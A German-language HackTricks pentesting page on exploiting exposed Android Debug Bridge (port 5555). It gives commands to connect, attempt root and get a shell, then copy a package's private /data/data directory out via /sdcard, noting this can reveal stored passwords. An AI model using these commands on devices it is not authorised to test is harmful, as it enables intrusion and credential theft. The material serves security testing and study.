hacktricks/network-services-pentesting/5555-android-debug-bridge.md

5555 - Android Debug Bridge

Lernen Sie AWS-Hacking von Grund auf mit htARTE (HackTricks AWS Red Team Expert)!

Andere Möglichkeiten, HackTricks zu unterstützen:

• Wenn Sie Ihr Unternehmen in HackTricks bewerben möchten oder HackTricks als PDF herunterladen möchten, überprüfen Sie die ABONNEMENTPLÄNE!
• Holen Sie sich das offizielle PEASS & HackTricks-Merchandise
• Entdecken Sie The PEASS Family, unsere Sammlung exklusiver NFTs
• Treten Sie der 💬 Discord-Gruppe oder der Telegram-Gruppe bei oder folgen Sie uns auf Twitter 🐦 @carlospolopm.
• Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die HackTricks und HackTricks Cloud Github-Repositories senden.

Grundlegende Informationen

Aus der Dokumentation:

Android Debug Bridge (adb) ist ein vielseitiges Befehlszeilentool, mit dem Sie mit einem Gerät kommunizieren können. Der adb-Befehl ermöglicht verschiedene Geräteaktionen wie Installation und Debugging von Apps und bietet Zugriff auf eine Unix-Shell, mit der Sie verschiedene Befehle auf einem Gerät ausführen können.

Standardport: 5555.

PORT     STATE SERVICE VERSION
5555/tcp open  adb     Android Debug Bridge device (name: msm8909; model: N3; device: msm8909)

Verbindung herstellen

Wenn Sie den ADB-Dienst auf einem Gerät finden, der auf einem bestimmten Port läuft, und Sie sich damit verbinden können, können Sie eine Shell im System erhalten:

adb connect 10.10.10.10
adb root # Try to escalate to root
adb shell

Für weitere ADB-Befehle überprüfen Sie die folgende Seite:

{% content-ref url="../mobile-pentesting/android-app-pentesting/adb-commands.md" %} adb-commands.md {% endcontent-ref %}

App-Daten dumpen

Um die Daten einer Anwendung vollständig herunterzuladen, können Sie Folgendes tun:

# From a root console
chmod 777 /data/data/com.package
cp -r /data/data/com.package /sdcard Note: Using ADB attacker cannot obtain data directly by using command " adb pull /data/data/com.package". He is compulsorily required to move data to Internal storage and then he can pull that data.
adb pull "/sdcard/com.package"

Du kannst diesen Trick verwenden, um sensible Informationen wie Chrome-Passwörter abzurufen. Weitere Informationen dazu findest du in den bereitgestellten Informationen und Referenzen hier.

Shodan

• Android Debug Bridge

Lerne AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)!

Andere Möglichkeiten, HackTricks zu unterstützen:

• Wenn du dein Unternehmen in HackTricks bewerben möchtest oder HackTricks als PDF herunterladen möchtest, schau dir die ABONNEMENTPLÄNE an!
• Hol dir das offizielle PEASS & HackTricks-Merchandise
• Entdecke The PEASS Family, unsere Sammlung exklusiver NFTs
• Trete der 💬 Discord-Gruppe oder der Telegram-Gruppe bei oder folge uns auf Twitter 🐦 @carlospolopm.
• Teile deine Hacking-Tricks, indem du Pull Requests an die HackTricks und HackTricks Cloud GitHub-Repositories sendest.